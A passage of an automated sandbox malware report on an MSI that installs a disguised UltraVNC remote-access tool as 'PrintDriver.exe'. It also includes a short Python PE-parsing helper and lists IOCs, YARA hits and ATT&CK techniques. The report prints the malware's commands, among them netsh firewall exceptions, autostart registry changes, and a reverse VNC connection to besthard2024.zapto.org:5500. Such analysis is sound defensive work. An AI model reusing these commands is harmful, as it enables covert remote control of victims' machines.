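            if path and all(0x20 <= b < 0x7F for b in path):   # keep printable ASCII only
                paths.append(path.decode("ascii"))
        pos = data.find(b"RSDS", pos + 4)
    return paths


def build_sample_pe() -> bytes:
    """Constructed stand-in for the dropped PrintDriver.exe: a minimal header with three
    sections and one RSDS record. It is sample input for this example, not a real binary."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # Machine=AMD64, NumberOfSections=3, no timestamp/symbols, SizeOfOptionalHeader=0
    file_header = struct.pack("<HHIIIHH", 0x8664, 3, 0, 0, 0, 0, 0x22)
    section_table = b"".join(name.ljust(8, b"\0") + b"\0" * 32
                             for name in (b".text", b".rdata", b"_RDATA"))
    rsds = (b"RSDS" + bytes(range(16)) + struct.pack("<I", 1)
            + rb"C:\Users\rudi\Desktop\git_ultravnc\winvnc\winvnc\x64\Release\winvnc.pdb" + b"\0")
    return dos_header + b"PE\0\0" + file_header + section_table + rsds


if __name__ == "__main__":
    sample = build_sample_pe()
    names = pe_section_names(sample)
    print("sections:", names)
    print("unusual:", unusual_sections(names))
    print("pdb:", pdb_paths(sample))
```

Run it against each of the .1.dr files from the report instead of the constructed sample to recover the table above directly; pdb_paths() is the more valuable of the two, because a developer's local build path is a pivot that survives renaming of the executable.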

                  Persistence and Installation Behavior

Source: C:\Windows\System32\msiexec.exe | Executable created and started: C:\Windows\Installer\MSI4384.tmp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe (4 entries)
Source: C:\Windows\System32\msiexec.exe | File created: C:\Games\PrintDriver.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Games\vnchooks.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI4384.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3F98.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI4075.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3FE7.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3ECB.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Games\ddengine.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Games\PrintDrivers.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSI3F39.tmp
Source: PrintDriver.exe.1.dr | Binary or memory string: bcdedit.exe
Source: PrintDriver.exe.1.dr | Binary or memory string: RegisterServiceCtrlHandlerExAadvapi32.dllProvides secure remote desktop sharingSYSTEM\CurrentControlSet\Services\%sFailed to open service control managerTcpipFailed: Permission deniedFailed to create a new serviceFailed to open the serviceFailed to query service statusFailed to delete the service" -inifile -serviceNetworkSYSTEM\CurrentControlSet\Control\SafeBoot\%s\%sServiceSYSTEMDRIVE/boot.inidefaultboot loaderoperating systems /safeboot:networkSystemRoot\system32\bcdedit.exe/set safeboot networkSeShutdownPrivilege-rebootforce-rebootsafemode/deletevalue safebootwinsta.dllWinStationConnectWLockWorkstation failed with error 0x%0lXWTSEnumerateSessionsAwtsapi32WTSFreeMemoryConsole -preconnect -service_rdp_run -service_run Global\SessionEventUltraGlobal\SessionEventUltraPreConnectGlobal\EndSessionEventGlobal\SessionUltraPreConnectsas.dllSendSASWinsta0\Winlogon\winsta.dllWinStationQueryInformationW\\.\Pipe\TerminalServer\SystemExecSrvr\%dwinlogon.exeWTSEnumerateProcessesASeTcbPrivilege@`

                  Boot Survival

Source: C:\Windows\System32\msiexec.exe | Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Load
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005A3D28 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_005A3D28
Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX (20 identical entries)
Source: C:\Windows\System32\msiexec.exe | Process information set: NOGPFAULTERRORBOX
Source: C:\Games\PrintDrivers.exe | Process information set: NOOPENFILEERRORBOX (2 entries)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX (3 entries)
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX (2 entries)
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOOPENFILEERRORBOX (4 entries)
Source: C:\Games\PrintDriver.exe | Process information set: NOOPENFILEERRORBOX (4 entries)
Source: C:\Windows\SysWOW64\taskkill.exe | Process information set: NOOPENFILEERRORBOX (3 entries)
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Games\vnchooks.dll
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI3F98.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI4075.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI3FE7.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI3ECB.tmp
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Games\ddengine.dll
Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI3F39.tmp
Source: C:\Games\PrintDrivers.exe | Check user administrative privileges: GetTokenInformation (graph_4-32859)
Source: C:\Windows\Installer\MSI4384.tmp | Check user administrative privileges: GetTokenInformation (graph_3-34047)
Source: C:\Windows\Installer\MSI4384.tmp | API coverage: 5.2 %
Source: C:\Games\PrintDrivers.exe | API coverage: 4.8 %
Source: C:\Windows\System32\msiexec.exe TID: 7576 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 7816 | Thread sleep count: 174 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 1908 | Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7908 | Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 2208 | Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 8164 | Thread sleep count: 182 > 30
Source: C:\Windows\SysWOW64\timeout.exe TID: 7648 | Thread sleep count: 62 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed (2 entries)
Source: C:\Windows\SysWOW64\timeout.exe | Last function: Thread delayed (2 entries)
Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation (7 identical entries)
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_00461914 FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00461914
Source: PrintDriver.exe, 0000001A.00000002.2958719797.0000021794F53000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{epP
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: , (Hyper-V Tools)
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: , (Hyper-V Server)
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: Service Pack: 6aService Pack: 1aService Pack:%d.%dService Pack:%dService Pack:0.%d, (Storage Server Enterprise), (Storage Server Express), (Storage Server Standard), (Storage Server Workgroup), (Storage Server Essentials), (Storage Server), (Home Server Premium Edition), (Home Server Edition), (Terminal Services), (Embedded), (Terminal Services in Remote Admin Mode), (64 Bit Edition), (Media Center Edition), (Tablet PC Edition), (Compute Cluster Edition), (Foundation Edition), (MultiPoint Premium Edition), (MultiPoint Edition), (Security Appliance), (BackOffice), (N Edition), (E Edition), (Hyper-V Tools), (Hyper-V Server), (Server Core), (Uniprocessor Free), (Uniprocessor Checked), (Multiprocessor Free), (Multiprocessor Checked), (Windows Essential Business Server Manangement Server), (Windows Essential Business Server Messaging Server), (Windows Essential Business Server Security Server), (Cluster Server), (Small Business Server), (Small Business Server Premium), (Prerelease), (Evaluation), (Automotive), (China), (Single Language), (Win32s), (Education), (Industry), (Student), (Mobile), (IoT Core), (Cloud Host Infrastructure Server), (S Edition), (Cloud Storage Server), (PPI Pro), (Connected Car), (Handheld)Failed in call to GetOSVersion
Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0044A1F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044A1F1
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005BB9CA mov eax, dword ptr fs:[00000030h] 4_2_005BB9CA
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005B3C84 mov eax, dword ptr fs:[00000030h] 4_2_005B3C84
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_004225A0 GetProcessHeap,3_2_004225A0
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI4384.tmp "C:\Windows\Installer\MSI4384.tmp" /DontWait /HideWindow /dir "C:\Games\" "C:\Games\PrintDrivers.exe" /HideWindow "C:\Games\PrintDrivers.cmd"
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0044A1F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044A1F1
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0044E23B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0044E23B
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0044A385 SetUnhandledExceptionFilter,3_2_0044A385
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0044985D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0044985D
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005A9256 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_005A9256
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005A5248 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_005A5248
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005A53DE SetUnhandledExceptionFilter,4_2_005A53DE
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005A47F5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_005A47F5
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_00427800 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW,3_2_00427800
Source: C:\Games\PrintDrivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\PrintDrivers.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\PrintDriver.txt"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Games\PrintDrivers.exe C:\Games\PrintDrivers.exe /HideWindow C:\Games\driverhelp.cmd
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic process where (name="PrintDriver.exe") get commandline
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /i "PrintDriver.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Games\PrintDriver.exe C:\Games\PrintDriver.exe -autoreconnect ID:5271523 -connect besthard2024.zapto.org:5500 -run
Source: C:\Games\PrintDrivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Games\driverhelp.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\mode.com Mode 90,20
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 20 (6 entries)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im rundll32.exe /f (3 entries)
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: Program Manager
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: Shell_TrayWnd
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: Progman
Source: PrintDriver.exe, 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, PrintDriver.exe.1.dr | Binary or memory string: UltraVNC.ini -settingshelperShell_TrayWnd%dpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-00B0D07B8C7C}
Source: PrintDriver.exe.1.dr | Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitplaceholder1placeholder2restartvncDesktop::~vncDesktop : ~vncDesktop
Source: C:\Games\PrintDrivers.exe | Code function: 4_2_005A5448 cpuid 4_2_005A5448
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_004650B7
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoW,3_2_0045F310
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoEx,FormatMessageA,3_2_004326C1
Source: C:\Windows\Installer\MSI4384.tmp | Code function: EnumSystemLocalesW,3_2_004649D3
Source: C:\Windows\Installer\MSI4384.tmp | Code function: EnumSystemLocalesW,3_2_004649D1
Source: C:\Windows\Installer\MSI4384.tmp | Code function: EnumSystemLocalesW,3_2_00464A1E
Source: C:\Windows\Installer\MSI4384.tmp | Code function: EnumSystemLocalesW,3_2_00464AB9
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_00464B50
Source: C:\Windows\Installer\MSI4384.tmp | Code function: EnumSystemLocalesW,3_2_0045EDE2
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoW,3_2_00464DB0
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00464ED5
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoW,3_2_00464FDB
Source: C:\Windows\Installer\MSI4384.tmp | Code function: GetLocaleInfoEx,3_2_00448F9C
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoW,4_2_005BF04D
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_005BF173
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoW,4_2_005BF279
Source: C:\Games\PrintDrivers.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_005BF348
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoEx,___wcsnicmp_ascii,4_2_005A433F
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoW,4_2_005B83B3
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,4_2_005A440A
Source: C:\Games\PrintDrivers.exe | Code function: EnumSystemLocalesW,4_2_005BECD4
Source: C:\Games\PrintDrivers.exe | Code function: EnumSystemLocalesW,4_2_005BEC89
Source: C:\Games\PrintDrivers.exe | Code function: EnumSystemLocalesW,4_2_005BED6F
Source: C:\Games\PrintDrivers.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_005BEDFA
Source: C:\Games\PrintDrivers.exe | Code function: EnumSystemLocalesW,4_2_005B7E3A
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (2 entries)
Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ VolumeInformation (2 entries)
Source: C:\Games\PrintDriver.exe | Queries volume information: C:\ VolumeInformation (2 entries)
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0044A445 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,3_2_0044A445
Source: C:\Windows\Installer\MSI4384.tmp | Code function: 3_2_0045F7A4 GetTimeZoneInformation,3_2_0045F7A4

                  Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram program="C:\Games\PrintDriver.exe" name="MyApplication" mode=ENABLE scope=ALL (2 entries; cf. the two netsh invocations in the process tree above, the second of which adds profile=ALL)

                  Stealing of Sensitive Information

Source: Yara match | File source: 26.2.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PrintDriver.exe PID: 7304, type: MEMORYSTR
Source: Yara match | File source: C:\Games\PrintDriver.exe, type: DROPPED

                  Remote Access Functionality

Source: Yara match | File source: 26.2.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 26.0.PrintDriver.exe.7ff67da80000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000001A.00000000.1861273877.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2961021528.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000000.1861087410.00007FF67DC37000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 0000001A.00000002.2961946553.00007FF67DD0C000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: PrintDriver.exe PID: 7304, type: MEMORYSTR
Source: Yara match | File source: C:\Games\PrintDriver.exe, type: DROPPED
Source: PrintDriver.exe, 0000001A.00000002.2957849457.000000D5AECFC000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: RFB 003.008
Source: PrintDriver.exe, 0000001A.00000002.2958719797.0000021794F53000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: RFB 003.008
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in parentheses is the report's match count for that technique)

Reconnaissance: Gather Victim Identity Information, Credentials, Email Addresses, Employee Names, Gather Victim Network Information, Domain Properties, DNS, Network Trust Dependencies, Network Topology, IP Addresses
Resource Development: Acquire Infrastructure, Domains, DNS Server, Virtual Private Server, Server, Botnet, Web Services, Serverless, Malvertising, Compromise Infrastructure
Initial Access: Replication Through Removable Media (1), Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services, Drive-by Compromise, Exploit Public-Facing Application, Supply Chain Compromise
Execution: Windows Management Instrumentation (1), Native API (1), Command and Scripting Interpreter (12), Cron, Launchd, Scheduled Task, Systemd Timers, Container Orchestration Job, Command and Scripting Interpreter, PowerShell
Persistence: DLL Side-Loading (1), Registry Run Keys / Startup Folder (1), Bootkit (1), Login Hook, Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Privilege Escalation: Exploitation for Privilege Escalation (1), DLL Side-Loading (1), Process Injection (12), Registry Run Keys / Startup Folder (1), Network Logon Script, RC Scripts, Startup Items, Scheduled Task/Job, At, Cron
Defense Evasion: Disable or Modify Tools (22), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), DLL Side-Loading (1), File Deletion (1), Masquerading (121), Modify Registry (1), Virtualization/Sandbox Evasion (1), Process Injection (12), Bootkit (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync, Proc Filesystem, /etc/passwd and /etc/shadow, Network Sniffing
Discovery: System Time Discovery (2), Peripheral Device Discovery (11), File and Directory Discovery (3), System Information Discovery (34), Security Software Discovery (121), Virtualization/Sandbox Evasion (1), Process Discovery (3), System Owner/User Discovery, Network Sniffing, Network Service Discovery
Lateral Movement: Remote Desktop Protocol (1), Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management, Cloud Services, Direct Cloud VM Connections, Shared Webroot
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture, Credential API Hooking, Data Staged, Local Data Staging
Command and Control: Encrypted Channel (1), Non-Standard Port (1), Remote Access Software (1), Non-Application Layer Protocol (1), Application Layer Protocol (1), Multiband Communication, Commonly Used Port, Application Layer Protocol, Web Protocols, File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Traffic Duplication, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Symmetric Encrypted Non-C2 Protocol, Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features, Network Denial of Service, Data Encrypted for Impact, Data Destruction, Data Encrypted for Impact, Service Stop, Inhibit System Recovery, Defacement, Internal Defacement, External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
Behavior Graph (ID: 1531399, Sample: rs8dpaIe6D.msi, Startdate: 11/10/2024, Architecture: WINDOWS, Score: 100), flattened from the graph image into a process tree. Numbers in square brackets are the graph's per-node created registry value / created file counts.

• Start node
  • DNS/IP: besthard2024.zapto.org
  • Signatures: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for submitted file; Yara detected UltraVNC Hacktool; AI detected suspicious sample
  • Started: PrintDrivers.exe [1], msiexec.exe [36 56], msiexec.exe [2]
• msiexec.exe [36 56]
  • Dropped: C:\Windows\Installer\MSI4384.tmp (PE32), C:\Games\PrintDriver.exe (PE32+), C:\Windows\Installer\MSI4075.tmp (PE32), 8 other files (none is malicious)
  • Signatures: Creates an undocumented autostart registry key; Drops executables to the windows directory (C:\Windows) and starts them
  • Started: msiexec.exe, MSI4384.tmp
• PrintDrivers.exe [1]
  • Started: cmd.exe [3]
    • Signatures: Uses cmd line tools excessively to alter registry or file data; Uses netsh to modify the Windows network and firewall settings; Modifies the windows firewall
    • Started: cmd.exe [1], PrintDrivers.exe, cmd.exe [1], 12 other processes
      • cmd.exe [1] started: PrintDriver.exe, WMIC.exe [1], netsh.exe [1 2], 3 other processes
      • PrintDrivers.exe started: cmd.exe, which started: cmd.exe, conhost.exe, mode.com, 7 other processes
        • cmd.exe: Uses cmd line tools excessively to alter registry or file data; started: reg.exe
      • cmd.exe [1]: Uses cmd line tools excessively to alter registry or file data; started: reg.exe [1]
• PrintDriver.exe
  • DNS/IP: besthard2024.zapto.org 94.156.104.60, ports 49743 and 5500, SARNICA-ASBG Bulgaria; 127.0.0.1 unknown unknown
  • Signatures: Multi AV Scanner detection for dropped file; Contains VNC / remote desktop functionality (version string found)

Antivirus detection (submitted file)
Source | Detection | Scanner | Label
rs8dpaIe6D.msi | 14% | Virustotal |
rs8dpaIe6D.msi | 26% | ReversingLabs | Win32.Trojan.Generic

Antivirus detection (dropped files)
Source | Detection | Scanner | Label
C:\Games\PrintDriver.exe | 5% | ReversingLabs |
C:\Games\PrintDriver.exe | 8% | Virustotal |
C:\Games\PrintDrivers.exe | 0% | ReversingLabs |
C:\Games\PrintDrivers.exe | 0% | Virustotal |
C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll | 0% | ReversingLabs |
C:\Games\UVncVirtualDisplay\UVncVirtualDisplay.dll | 0% | Virustotal |
C:\Games\ddengine.dll | 0% | ReversingLabs |
C:\Games\ddengine.dll | 0% | Virustotal |
C:\Games\vnchooks.dll | 0% | ReversingLabs |
C:\Games\vnchooks.dll | 0% | Virustotal |
C:\Windows\Installer\MSI3ECB.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI3ECB.tmp | 0% | Virustotal |
C:\Windows\Installer\MSI3F39.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI3F39.tmp | 0% | Virustotal |
C:\Windows\Installer\MSI3F98.tmp | 0% | ReversingLabs |
C:\Windows\Installer\MSI3F98.tmp | 0% | Virustotal |
C:\Windows\Installer\MSI3FE7.tmp | 0% | Virustotal |
